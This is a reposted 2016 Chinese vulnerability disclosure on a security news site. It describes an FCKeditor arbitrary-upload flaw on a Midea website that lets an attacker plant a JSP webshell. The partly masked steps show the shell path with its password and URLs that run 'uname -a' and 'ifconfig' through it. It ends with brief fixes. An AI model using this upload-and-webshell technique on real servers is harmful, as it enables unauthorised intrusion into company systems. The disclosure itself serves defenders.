频道栏目
首页 > 安全 > 网站安全 > 正文

美的系列1之美的某站任意文件导致Getshell

2016-07-01 09:12:22           
收藏   我要投稿

看了下厂商历史的漏洞,还可以。不是那种整天重复一句话的厂商。

--------------------------------------------------------------

宿舍楼下有个小卖部,洗完衣服晾到宿舍阳台上。背景交代完毕…割了~~
衣物被夜里的风刮楼下了。杯具是裤子和T恤掉楼下了,内裤挂在了小卖部门前那棵十分起眼的风景树上。
小卖部人来人往,好多人都在调侃挂在树上的那条内裤,为了隐藏真相~我也加入了调侃。

 

mask 区域
*****??程?*****
**********
*****人换了一个插*****
**********
1.http://**.**.**/ 发现贵站存在fck任意上传..._
**********
*****bc67.png" alt="Tangscan?*****
**********
**********
*****个sh*****
2.http://**.**.**//UserFiles/Image/tang_77270(1).jsp 密码023_
**********
3.http://**.**.**/UserFiles/Image/tang_77270(1).jsppwd=023&i=uname -a_
**********
*****e2262cd7.png" alt="获?*****
**********
4.http://**.**.**/UserFiles/Image/tang_77270(1).jsppwd=023&i=ifconfig_
**********
*****点?*****
**********
*****c5d92f7bc1a62db2.png" al*****

 

我要去弄系列2了,不深入了。看了下,你们财务什么的系统都在上面,不一一举例了。想看就慢慢cd ../找

解决方案:

升级fck,进制脚本在某些目录运行。

加强员工意识。

相关TAG标签 美的 文件
上一篇:19e某平台任意用户密码重置/手机号遍历/SQL注入(涉及500w订单信息)
下一篇:快钱某站上传Getshell
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站